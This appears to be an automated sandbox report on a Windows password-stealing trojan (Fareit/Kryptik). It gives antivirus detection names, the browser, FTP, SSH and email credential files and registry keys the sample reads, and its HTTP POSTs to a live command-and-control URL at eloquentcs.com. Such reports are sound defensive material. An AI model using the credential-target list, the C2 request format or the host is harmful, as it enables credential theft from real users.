| 查杀引擎 | 查杀结果 | 查杀时间 | 查杀版本 |
|---|---|---|---|
| McAfee | Fareit-FPQ!66726A9C25D2 | 20201023 | 6.0.6.653 |
| Alibaba | Trojan:Win32/Kryptik.76001d0a | 20190527 | 0.3.0.5 |
| Baidu | 20190318 | 1.0.0.2 | |
| Avast | Win32:Trojan-gen | 20201023 | 18.4.3895.0 |
| Kingsoft | 20201023 | 2013.8.14.323 | |
| Tencent | Win32.Trojan.Inject.Auto | 20201023 | 1.0.0.1 |
| CrowdStrike | win/malicious_confidence_90% (W) | 20190702 | 1.0 |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography\MachineGuid |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox |
| section | CODE |
| section | DATA |
| section | BSS |
| packer | BobSoft Mini Delphi -> BoB / BobSoft |
| suspicious_features | POST method with no referer header, HTTP version 1.0 used | suspicious_request | POST http://eloquentcs.com/five/fre.php | ||||||
| request | POST http://eloquentcs.com/five/fre.php |
| request | POST http://eloquentcs.com/five/fre.php |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Google\Chrome\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Opera\Opera Next\data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Chromium\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\LocalMapleStudio\ChromePlus\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\MapleStudio\ChromePlus\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Nichrome\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Web Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\RockMelt\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Login Data |
| file | C:\Users\Administrator.Oskar-PC\AppData\Local\Yandex\YandexBrowser\User Data\Default\Web Data |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\SeaMonkey |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Firefox |
| entropy | 7.645058887632109 | section | {'size_of_data': '0x0001e000', 'virtual_address': '0x000c5000', 'entropy': 7.645058887632109, 'name': '.rsrc', 'virtual_size': '0x0001de48'} | description | A section with a high entropy has been found | |||||||||
| host | 172.217.24.14 | |||
| file | C:\Program Files (x86)\FTPGetter\Profile\servers.xml |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\FTPGetter\servers.xml |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\Estsoft\ALFTP\ESTdb2.dat |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\wcx_ftp.ini |
| file | C:\Windows\wcx_ftp.ini |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\GHISLER\wcx_ftp.ini |
| file | C:\Users\Administrator.Oskar-PC\wcx_ftp.ini |
| file | C:\Windows\32BitFtp.ini |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\sitemanager.xml |
| file | C:\Program Files (x86)\FileZilla\Filezilla.xml |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\filezilla.xml |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\FileZilla\recentservers.xml |
| registry | HKEY_CURRENT_USER\Software\Far\Plugins\FTP\Hosts |
| registry | HKEY_CURRENT_USER\Software\Far2\Plugins\FTP\Hosts |
| registry | HKEY_CURRENT_USER\Software\Ghisler\Total Commander |
| registry | HKEY_CURRENT_USER\Software\VanDyke\SecureFX |
| registry | HKEY_CURRENT_USER\Software\LinasFTP\Site Manager |
| registry | HKEY_CURRENT_USER\Software\FlashPeak\BlazeFtp\Settings |
| registry | HKEY_CURRENT_USER\Software\SimonTatham\PuTTY\Sessions |
| registry | HKEY_LOCAL_MACHINE\Software\SimonTatham\PuTTY\Sessions |
| registry | HKEY_CURRENT_USER\Software\Martin Prikryl |
| registry | HKEY_LOCAL_MACHINE\Software\Martin Prikryl |
| file | C:\Users\Administrator.Oskar-PC\AppData\Roaming\.purple\accounts.xml |
| registry | HKEY_CURRENT_USER\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook |
| registry | HKEY_LOCAL_MACHINE\SOFTWARE\Mozilla\Mozilla Thunderbird |
| registry | HKEY_CURRENT_USER\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook |
| Bkav | W32.AIDetectVM.malware2 |
| Elastic | malicious (high confidence) |
| MicroWorld-eScan | Trojan.GenericKD.43675438 |
| FireEye | Generic.mg.66726a9c25d288f9 |
| McAfee | Fareit-FPQ!66726A9C25D2 |
| Cylance | Unsafe |
| Sangfor | Malware |
| K7AntiVirus | Riskware ( 0040eff71 ) |
| Alibaba | Trojan:Win32/Kryptik.76001d0a |
| K7GW | Riskware ( 0040eff71 ) |
| Cybereason | malicious.40952a |
| BitDefenderTheta | AI:Packer.6CF7A26721 |
| Symantec | Trojan Horse |
| APEX | Malicious |
| Paloalto | generic.ml |
| Kaspersky | HEUR:Trojan.Win32.Kryptik.gen |
| BitDefender | Trojan.GenericKD.43675438 |
| NANO-Antivirus | Trojan.Win32.Kryptik.hsgbzt |
| Avast | Win32:Trojan-gen |
| Rising | Trojan.Kryptik!1.CAC0 (CLASSIC) |
| Ad-Aware | Trojan.GenericKD.43675438 |
| Comodo | Malware@#20ja4eoej1zaf |
| DrWeb | Trojan.PWS.Siggen2.53602 |
| VIPRE | Trojan.Win32.Generic!BT |
| Invincea | Mal/Generic-S |
| McAfee-GW-Edition | BehavesLike.Win32.Fareit.ch |
| Sophos | Mal/Generic-S |
| Jiangmin | Trojan.Kryptik.cby |
| Webroot | W32.Trojan.Gen |
| Avira | TR/Kryptik.xbfxz |
| Microsoft | Trojan:Win32/Pwsteal.Q!rfn |
| AegisLab | Trojan.Win32.Kryptik.4!c |
| ZoneAlarm | HEUR:Trojan.Win32.Kryptik.gen |
| GData | Trojan.GenericKD.43675438 |
| AhnLab-V3 | Suspicious/Win.Delphiless.X2094 |
| VBA32 | TScope.Trojan.Delf |
| ALYac | Backdoor.RAT.MSIL.NanoCore |
| MAX | malware (ai score=86) |
| ESET-NOD32 | a variant of Win32/GenKryptik.EQMB |
| Tencent | Win32.Trojan.Inject.Auto |
| Yandex | Trojan.GenKryptik!abtyHxYZq8k |
| Ikarus | Trojan.Win32.Injector |
| Fortinet | W32/Injector.EMZL!tr |
| AVG | Win32:Trojan-gen |
| Panda | Trj/CI.A |
| CrowdStrike | win/malicious_confidence_90% (W) |
| Qihoo-360 | Win32/Trojan.469 |
| dead_host | 172.217.24.14:443 |
| dead_host | 172.217.160.110:443 |
No hosts contacted.
| Name | Response | Post-Analysis Lookup |
|---|---|---|
| eloquentcs.com | A 103.83.81.17 | |
| time.windows.com |
A 20.189.79.72
CNAME time.microsoft.akadns.net |
|
| dns.msftncsi.com | A 131.107.255.255 | 131.107.255.255 |
| clients2.google.com |
A 172.217.160.110
CNAME clients.l.google.com |
216.58.200.238 |
| dns.msftncsi.com | AAAA fd3e:4f5a:5b81::1 | 131.107.255.255 |
| teredo.ipv6.microsoft.com | 127.0.0.1 |
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 49182 | 103.83.81.17 eloquentcs.com | 80 |
| 192.168.56.101 | 49184 | 103.83.81.17 eloquentcs.com | 80 |
| 192.168.56.101 | 49187 | 103.83.81.17 eloquentcs.com | 80 |
| Source | Source Port | Destination | Destination Port |
|---|---|---|---|
| 192.168.56.101 | 50002 | 114.114.114.114 | 53 |
| 192.168.56.101 | 51808 | 114.114.114.114 | 53 |
| 192.168.56.101 | 51963 | 114.114.114.114 | 53 |
| 192.168.56.101 | 55368 | 114.114.114.114 | 53 |
| 192.168.56.101 | 56539 | 114.114.114.114 | 53 |
| 192.168.56.101 | 62912 | 114.114.114.114 | 53 |
| 192.168.56.101 | 137 | 192.168.56.255 | 137 |
| 192.168.56.101 | 138 | 192.168.56.255 | 138 |
| 192.168.56.101 | 123 | 20.189.79.72 time.windows.com | 123 |
| 192.168.56.101 | 51378 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 53237 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 56804 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 58367 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 60123 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 60384 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 61680 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 62191 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 62318 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 65004 | 224.0.0.252 | 5355 |
| 192.168.56.101 | 1900 | 239.255.255.250 | 1900 |
| URI | Data |
|---|---|
| http://eloquentcs.com/five/fre.php | POST /five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: eloquentcs.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 29145E52 Content-Length: 169 Connection: close |
| http://eloquentcs.com/five/fre.php | POST /five/fre.php HTTP/1.0 User-Agent: Mozilla/4.08 (Charon; Inferno) Host: eloquentcs.com Accept: */* Content-Type: application/octet-stream Content-Encoding: binary Content-Key: 29145E52 Content-Length: 196 Connection: close |
No ICMP traffic performed.
No IRC requests performed.
No Suricata Alerts
No Suricata TLS
No Snort Alerts